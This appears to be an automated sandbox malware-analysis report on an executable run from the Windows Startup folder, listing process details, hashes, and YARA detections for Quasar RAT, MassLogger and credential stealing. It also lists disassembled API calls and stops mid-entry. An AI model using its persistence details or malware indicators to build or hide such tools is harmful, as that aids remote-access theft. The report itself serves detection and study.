Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Imagebase:	0x270000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: a.exe PID: 5036 Parent PID: 740

General

Start time:	20:35:31
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Imagebase:	0xa90000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: a.exe PID: 6772 Parent PID: 5596

General

Start time:	20:35:48
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'
Imagebase:	0x5b0000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: a.exe PID: 5508 Parent PID: 6772

General

Start time:	20:36:03
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
Imagebase:	0xb20000
File size:	129536 bytes
MD5 hash:	7D9D8812398EAF9AC0D85E728BBF8637
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, Author: Joe Security Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Feuil1

Declaration

Line	Content
1	Attribute VB_Name = "Feuil1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Non-Executed Functions

Subroutine a, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
9	Sub a()
12	End Sub

Reset < >

Analysis Process: a.exe PID: 6200 Parent PID: 7032 a.exeCOMMON

Executed Functions

Function 00E696B0, Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00E698F6

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 580fb9e82f1441763d9ae51a6d6d0ecb8dfc86f03766a3463901282d3ff81983
Instruction ID: 91babfdbf2fc8e650c59d7345e8683b7a4e5153bccd3f2421ebaaba8b1c04d3f
Opcode Fuzzy Hash: 580fb9e82f1441763d9ae51a6d6d0ecb8dfc86f03766a3463901282d3ff81983
Instruction Fuzzy Hash: 24713570A00B058FD724DF2AE55575ABBF5FF88344F008A2ED05AEBA51DB74E805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00E6DC68, Relevance: 1.6, APIs: 1, Instructions: 131COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E6FE2A

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c53e4e20362b7c36da2f76e1bc082e25a70c13747c33cce4add2e16adf97ac9d
Instruction ID: 0433f3f8ff4bea137d7eb7f7f98293adb7e824b7ad11199885711c45070e1937
Opcode Fuzzy Hash: c53e4e20362b7c36da2f76e1bc082e25a70c13747c33cce4add2e16adf97ac9d
Instruction Fuzzy Hash: 285100B1D003489FDB14CFA9E884ADEBFB5FF49354F24852AE818AB211D775A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6FD0D, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E6FE2A

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f6b58106207b331285eb7528532533d0442412e5372aba67e2f5fd6097272fa8
Instruction ID: 9ae422c199d8f3a16e0f0fbe601ebcf545d3d99dde40e5855a67a9c3f95b6b90
Opcode Fuzzy Hash: f6b58106207b331285eb7528532533d0442412e5372aba67e2f5fd6097272fa8
Instruction Fuzzy Hash: B551DEB1D003189FDB14CFA9D884ADEBFB1FF88354F24852AE818AB211D775A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6DC84, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E6FE2A

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: cad58c4f0351160789d481e404fc316c669e40a9de41668417ea74f61b66e81b
Instruction ID: 7f8dfa4f226cd94982374144b5ac3d54b42769ee71c54d101d5f76455e111e65
Opcode Fuzzy Hash: cad58c4f0351160789d481e404fc316c669e40a9de41668417ea74f61b66e81b
Instruction Fuzzy Hash: 6751DFB1D00308DFDB14CFA9D884ADEBFB5BF48354F24852AE819AB211D770A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6DC88, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E6FE2A

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 239312d9357e3894640ce74d787b1d8d0439bccea358d410a949b0179ac5baa4
Instruction ID: 0b4f5812ea78848679a28d87b4e80bc065785b0d25e154ed9fc07cc0962cead5
Opcode Fuzzy Hash: 239312d9357e3894640ce74d787b1d8d0439bccea358d410a949b0179ac5baa4
Instruction Fuzzy Hash: 6951EEB1D00308DFDB14CFA9D884ADEBFB5BF88354F24812AE819AB210D770A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E69B11, Relevance: 1.6, APIs: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00E69971,00000800,00000000,00000000), ref: 00E69B82

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bdd4aaa9115657a4dcf86dcada711d1f88661f372dd0b487c6957cecc5ee6046
Instruction ID: a76e3dbf5802b241c57d7129c80596a107ee9192b96d0bf995688857bd231cf6
Opcode Fuzzy Hash: bdd4aaa9115657a4dcf86dcada711d1f88661f372dd0b487c6957cecc5ee6046
Instruction Fuzzy Hash: 4F414AB1C00258CFCB20CF99E4447DEBBF8EB88368F14955AD415B7652C7745949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E63DE4, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00E65421

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 0e4afedef4d4cbab2ddfd1b37e0518459b89cb836da959a3800f0d818a3257dd
Instruction ID: 5b1f1fddbe504c1410f96c652cf22466825c770759b725a5ea55405ab2d0a02a
Opcode Fuzzy Hash: 0e4afedef4d4cbab2ddfd1b37e0518459b89cb836da959a3800f0d818a3257dd
Instruction Fuzzy Hash: BB41F171D00628DFDB24DFAAC8447DEBBB1BF49308F20806AD419BB251DB756985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E6536B, Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00E65421

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 6ca3b1ae3797191a5d0b4649af0b438ea6e6d4956e4be26323eb43880ce32b5b
Instruction ID: 1044a59a7246738429f16d3cf70afbc34f8374ee2b0589e6d183fe8be9eb5285
Opcode Fuzzy Hash: 6ca3b1ae3797191a5d0b4649af0b438ea6e6d4956e4be26323eb43880ce32b5b
Instruction Fuzzy Hash: 9F41E271D00628CFDB24DFAAC8847CDBBB1BF49308F24806AD419BB251DB756986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E69650, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E6B89E,?,?,?,?,?), ref: 00E6B95F

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 539f064c6119c72016ce444c3b4e8eae43dd57f4b06c0ef6fb3599ce19b33735
Instruction ID: 139ea05f380b6d0178fbb6d7296fdec7a87601c0ecae698308d44ee66d694bd6
Opcode Fuzzy Hash: 539f064c6119c72016ce444c3b4e8eae43dd57f4b06c0ef6fb3599ce19b33735
Instruction Fuzzy Hash: 0F21E4B5900218EFDB10CFA9D984ADEBFF8EB49324F14842AE914B7310D374A954CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E6B8D7, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00E6B89E,?,?,?,?,?), ref: 00E6B95F

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9ecb68a6b7dc992d74f98104d5e3f9997acf105c1e810f37c3f1127e77b8b4a3
Instruction ID: a6f612fa6018e3800dce45ba54a9d967ffc9a2c300984181180b205f64c1c4ab
Opcode Fuzzy Hash: 9ecb68a6b7dc992d74f98104d5e3f9997acf105c1e810f37c3f1127e77b8b4a3
Instruction Fuzzy Hash: 9621C4B5900258EFDB10CFA9D984ADEBFF4EB49324F14841AE954B7310D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E692C8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00E69971,00000800,00000000,00000000), ref: 00E69B82

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d740bdf82795d8ca1221de20de4fa0de804fddf4867261393673426da41e2a11
Instruction ID: 99e80137df0a7f55873d1ddd686349e9ed73d8b43b7d28f0d802cc7e46be0593
Opcode Fuzzy Hash: d740bdf82795d8ca1221de20de4fa0de804fddf4867261393673426da41e2a11
Instruction Fuzzy Hash: B71117B19003189FDB10DF9AD444BDEFBF8EB88364F14841AD415B7201C374A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E69890, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00E698F6

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6ea359e927b6f062e321f1ee04b8c118dfc9675a097fea3803deb6ed1b72f056
Instruction ID: c9e1c3c231c2cb3020bff1876eae0cc330ac6976970bb14dee0c79f83bb41f61
Opcode Fuzzy Hash: 6ea359e927b6f062e321f1ee04b8c118dfc9675a097fea3803deb6ed1b72f056
Instruction Fuzzy Hash: B4110FB1C006598FCB10DF9AD844BDEFBF8EB89324F14841AD829B7200D378A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CFD4C4, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709306385.0000000000CFD000.00000040.00000001.sdmp, Offset: 00CFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f793dfb8cf9ce4d84605463b7ff218c151e266957a613d59e6fee2293fbcda60
Instruction ID: c02823ebd789755148bc79411934075b54bb91a2424674a83c3f9451c6538908
Opcode Fuzzy Hash: f793dfb8cf9ce4d84605463b7ff218c151e266957a613d59e6fee2293fbcda60
Instruction Fuzzy Hash: A72137B1500248EFDB45DF14D8C0B36BF66FB88328F24C569E9060B246C336D946DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709337810.0000000000D0D000.00000040.00000001.sdmp, Offset: 00D0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ac8c4a5a7f90a0b7c7ce731d1e11f98fcb346c490dbe445eaa01ea9d8595b7
Instruction ID: 5b47d038b5dd125c0672371fb91fbae3c3358b961db1e5c5fbf98ad6c000facb
Opcode Fuzzy Hash: a9ac8c4a5a7f90a0b7c7ce731d1e11f98fcb346c490dbe445eaa01ea9d8595b7
Instruction Fuzzy Hash: 8721C571504240EFDB05DF64D9C4B26BB66FB88318F24C56EE84D4B286C736D846CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709337810.0000000000D0D000.00000040.00000001.sdmp, Offset: 00D0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff84ef6d8664e321e554ab2e05e8b46dd319b903e692a4bcfe17da61a7ebfbf
Instruction ID: 497b7ea1b9ebbe604ce49dc065d17b2f08d4f5d6718d23b593737cba045707d2
Opcode Fuzzy Hash: 5ff84ef6d8664e321e554ab2e05e8b46dd319b903e692a4bcfe17da61a7ebfbf
Instruction Fuzzy Hash: 1121B075604240EFDB14DF54D9C4B16BB66EB88324F28C96AE84D4B286C33AD846CA71

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709337810.0000000000D0D000.00000040.00000001.sdmp, Offset: 00D0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fefec9b2b58d3e4c70a7b673bfaea2985f6237007050e0abb7b7bfce6eb1c5ec
Instruction ID: 8cd50a62d303eebebdf72de81f7c716c61f030432404902bddfc69d49d474884
Opcode Fuzzy Hash: fefec9b2b58d3e4c70a7b673bfaea2985f6237007050e0abb7b7bfce6eb1c5ec
Instruction Fuzzy Hash: 112180755093C09FCB12CF24D994715BF71EB46314F28C5EBD8498B697C33A984ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CFD4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709306385.0000000000CFD000.00000040.00000001.sdmp, Offset: 00CFD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e090c108984f2da9f3b974c0c5930d99cdb836e0643ec5fc018aa799336ab9c0
Instruction ID: 2970c7918a20780fb1106ed354ed2656b6b36c52716aa1ebb25495193dee64b4
Opcode Fuzzy Hash: e090c108984f2da9f3b974c0c5930d99cdb836e0643ec5fc018aa799336ab9c0
Instruction Fuzzy Hash: 4811E6B6804284DFCF55CF10D5C4B26BF72FB84324F28C6A9D9450B656C33AD95ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709337810.0000000000D0D000.00000040.00000001.sdmp, Offset: 00D0D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad03bd373f370b18f7c4a82085381b61bd1174d59024f7911b383322e5da7f65
Instruction ID: ffbb877994aa5e4988a060264369d9f9e2aeeca367df13d97cf6172c0facfb83
Opcode Fuzzy Hash: ad03bd373f370b18f7c4a82085381b61bd1174d59024f7911b383322e5da7f65
Instruction Fuzzy Hash: BA119D75904280DFDB11CF64D5C4B15FBB2FB84324F28C6AED8494B696C33AD85ACB61

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E6E598, Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6788fa9e13667d29f92be2021efd8c25fd06e24d62b85f0d1f82fbdbc5225cb1
Instruction ID: c4b475b26350a11a3e855861593adc4ea63794fc8a041c8bdc4822f8b77ec2a2
Opcode Fuzzy Hash: 6788fa9e13667d29f92be2021efd8c25fd06e24d62b85f0d1f82fbdbc5225cb1
Instruction Fuzzy Hash: 5A12C7F1D917468BE310CF65E8881897F61F745328BD2CB28D9652BAE0D7B4116ECF88

Uniqueness

Uniqueness Score: -1.00%

Function 00E6C154, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ada5f7e83fb2f5a755f499bd0cb15366d555e48e3e7f00a052122e60b150a186
Instruction ID: 42f8e92db7c8f990cfa94f91c5b817f60fed78504c0a690fe688fda6a1632990
Opcode Fuzzy Hash: ada5f7e83fb2f5a755f499bd0cb15366d555e48e3e7f00a052122e60b150a186
Instruction Fuzzy Hash: 7DA19F32E406198FCF05DFA5D8445EEBBF2FF85344B25956AE805BB261EB31A905CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E6E597, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.709466882.0000000000E60000.00000040.00000001.sdmp, Offset: 00E60000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9bd06482cce565bc0f30d550d9785a654f68bfb94cd407527e8c6f9615a9729
Instruction ID: ab3cb62342c36575747b3d8fec2f5eb1f3ac3c5ebcc52f9538deff6f356737a3
Opcode Fuzzy Hash: f9bd06482cce565bc0f30d550d9785a654f68bfb94cd407527e8c6f9615a9729
Instruction Fuzzy Hash: C1C1F7B1D917468BE710CF65E8881897F71FB85328F92CB28D9612B6D0D7B4106ECF88

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: a.exe PID: 740 Parent PID: 3424 a.exeCOMMON

Executed Functions

Function 00FA96B0, Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00FA98F6

Memory Dump Source

Source File: 0000000B.00000002.771747797.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7e0ace334e636dd2f32488887b159fdad501b9aa01f58898bd63e5dfd790e8a1
Instruction ID: 710a8ba1d7f745faae334cfcd22dc2f636c5f78f9e64d7352b1f8c44d8d36ddd
Opcode Fuzzy Hash: 7e0ace334e636dd2f32488887b159fdad501b9aa01f58898bd63e5dfd790e8a1
Instruction Fuzzy Hash: D57136B0A00B058FD724DF2AC45575ABBF1FF89354F008929D45AD7B40DB74E806DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FADC68, Relevance: 1.6, APIs: 1, Instructions: 133COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FAFE2A

Memory Dump Source

Source File: 0000000B.00000002.771747797.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 691a6d787a32154cb7e68050ec3a83f8132059a8122330f88d74ab5db1ba1f89
Instruction ID: c27e41a6873c63081ce950a6c45173bf7cbf48361bcb9461ce97da8116f00aaf
Opcode Fuzzy Hash: 691a6d787a32154cb7e68050ec3a83f8132059a8122330f88d74ab5db1ba1f89
Instruction Fuzzy Hash: 5A511FB1D003599FDB15CFA9C884ADEBFB5FF49314F24852AE808AB251DB70A845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FAFD0D, Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FAFE2A

Memory Dump Source

Source File: 0000000B.00000002.771747797.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 093f847132ba03c9f672142268d175506dd5ed265972393b6f0b03b39bbc4b43
Instruction ID: d10ede72c2b76091557e7918695a792657fdacdce6660fd449f2bdb21bbf411a
Opcode Fuzzy Hash: 093f847132ba03c9f672142268d175506dd5ed265972393b6f0b03b39bbc4b43
Instruction Fuzzy Hash: 1C51CEB1D003189FDF14CFA9C884ADEBBB5FF48314F64862AE819AB251D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FADC84, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00FAFE2A

Memory Dump Source

Source File: 0000000B.00000002.771747797.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4f6d6f36f9eef61408b63ed77581a097193ac5a44586b191f5b1708fd4478ad5
Instruction ID: 21c35bb750c725d052bb8539369034d0e65b265d80afa1e5b76d8f1f0e1fc2e0
Opcode Fuzzy Hash: 4f6d6f36f9eef61408b63ed77581a097193ac5a44586b191f5b1708fd4478ad5
Instruction Fuzzy Hash: D851CEB1D00309AFDB14CF99C884ADEBBB5BF48314F24852AE819AB211D774A985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA5364, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00FA5421

Memory Dump Source

Source File: 0000000B.00000002.771747797.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 16b8c073bdf3c5a0d06ce3eb4efca5b034503a5bb744b54fe01d71cb8fd301db
Instruction ID: 075b39706fa7e39fd6bf622f66e4553aada4f5d3ca99b4a89e66aeceb6570fdd
Opcode Fuzzy Hash: 16b8c073bdf3c5a0d06ce3eb4efca5b034503a5bb744b54fe01d71cb8fd301db
Instruction Fuzzy Hash: 9E41F2B1C00628CFDB14DFA9C8947DDBBB5BF49318F20816AD409BB251DB756946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA3DE4, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00FA5421

Memory Dump Source

Source File: 0000000B.00000002.771747797.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2f7f633938c12a7253b05b94c5e3b7b33ce4b8a95f832929dabb72038ed79d60
Instruction ID: 31ea6ae7e68f5cf19fb927dd0a7b6aa797911e873681a2e94a4a8c6505ab9e73
Opcode Fuzzy Hash: 2f7f633938c12a7253b05b94c5e3b7b33ce4b8a95f832929dabb72038ed79d60
Instruction Fuzzy Hash: 0841D2B1C00728CFDB24DFA9C85479EBBB5BF49308F208069D409BB251DB756985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9650, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00FAB89E,?,?,?,?,?), ref: 00FAB95F

Memory Dump Source

Source File: 0000000B.00000002.771747797.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1d8f50c93b14f78f000c22d835d088b53a6d7d01166ec4ed7ba065c78506a08d
Instruction ID: ba15617c6d4cfb42bfa44029e8bb03dabca94e249d9ad91b7820ea14a136cab8
